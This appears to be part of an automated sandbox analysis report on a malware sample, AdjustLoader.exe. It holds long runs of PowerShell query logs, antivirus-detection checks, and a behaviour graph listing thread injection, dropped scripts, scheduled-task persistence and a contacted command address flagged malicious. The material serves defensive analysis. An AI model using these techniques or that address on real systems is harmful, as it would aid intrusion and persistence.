Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF78030 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 47_2_0000024D9FF78030
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.11.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502262 Sample: AdjustLoader.exe Startdate: 31/08/2024 Architecture: WINDOWS Score: 100 91 ipwho.is 2->91 111 Suricata IDS alerts for network traffic 2->111 113 Malicious sample detected (through community Yara rule) 2->113 115 Multi AV Scanner detection for submitted file 2->115 117 13 other signatures 2->117 10 wscript.exe 2->10         started        13 AdjustLoader.exe 4 2->13         started        16 powershell.exe 2->16         started        18 wscript.exe 2->18         started        signatures3 process4 file5 137 Wscript starts Powershell (via cmd or directly) 10->137 139 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->139 141 Suspicious execution chain found 10->141 20 cmd.exe 10->20         started        87 C:\Users\user\AppData\...\tmp6432.tmp.bat, DOS 13->87 dropped 89 C:\Users\user\...\AdjustLoader.exe.log, CSV 13->89 dropped 23 cmd.exe 1 13->23         started        143 Writes to foreign memory regions 16->143 145 Modifies the context of a thread in another process (thread injection) 16->145 147 Injects a PE file into a foreign processes 16->147 25 dllhost.exe 16->25         started        27 conhost.exe 16->27         started        29 cmd.exe 18->29         started        signatures6 process7 signatures8 119 Suspicious powershell command line found 20->119 121 Wscript starts Powershell (via cmd or directly) 20->121 123 Suspicious command line found 20->123 31 powershell.exe 20->31         started        44 6 other processes 20->44 35 powershell.exe 33 23->35         started        38 WMIC.exe 1 23->38         started        40 WMIC.exe 1 23->40         started        46 4 other processes 23->46 125 Injects code into the Windows Explorer (explorer.exe) 25->125 127 Writes to foreign memory regions 25->127 129 Creates a thread in another existing process (thread injection) 25->129 131 Injects a PE file into a foreign processes 25->131 48 7 other processes 25->48 42 powershell.exe 29->42         started        50 6 other processes 29->50 process9 dnsIp10 93 83.143.112.51, 49747, 6000 INTERNETIA_ETTH2-ASNoc-BialystokPL Germany 31->93 95 ipwho.is 195.201.57.90, 443, 49748 HETZNER-ASDE Germany 31->95 97 Writes to foreign memory regions 31->97 99 Modifies the context of a thread in another process (thread injection) 31->99 101 Hides threads from debuggers 31->101 109 3 other signatures 31->109 52 powershell.exe 31->52         started        55 schtasks.exe 31->55         started        57 WerFault.exe 31->57         started        59 WerFault.exe 31->59         started        83 C:\Windows\$nya-onimai3\$nya-Loli.vbs, ASCII 35->83 dropped 85 C:\Windows\$nya-onimai3\$nya-Loli.bat, DOS 35->85 dropped 103 Uses schtasks.exe or at.exe to add and modify task schedules 35->103 105 Found suspicious powershell code related to unpacking or dynamic code loading 35->105 61 powershell.exe 37 35->61         started        63 schtasks.exe 1 35->63         started        65 WerFault.exe 20 16 35->65         started        107 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 38->107 67 schtasks.exe 42->67         started        69 2 other processes 42->69 file11 signatures12 process13 signatures14 133 Injects a PE file into a foreign processes 52->133 71 conhost.exe 52->71         started        73 powershell.exe 52->73         started        75 conhost.exe 55->75         started        135 Loading BitLocker PowerShell Module 61->135 77 conhost.exe 61->77         started        79 conhost.exe 63->79         started        81 conhost.exe 67->81         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
83.143.112.51
 unknown Germany
43939 INTERNETIA_ETTH2-ASNoc-BialystokPL true
195.201.57.90
 ipwho.is Germany
24940 HETZNER-ASDE false

Contacted Domains

Name IP Active
ipwho.is 195.201.57.90 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ipwho.is/ false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown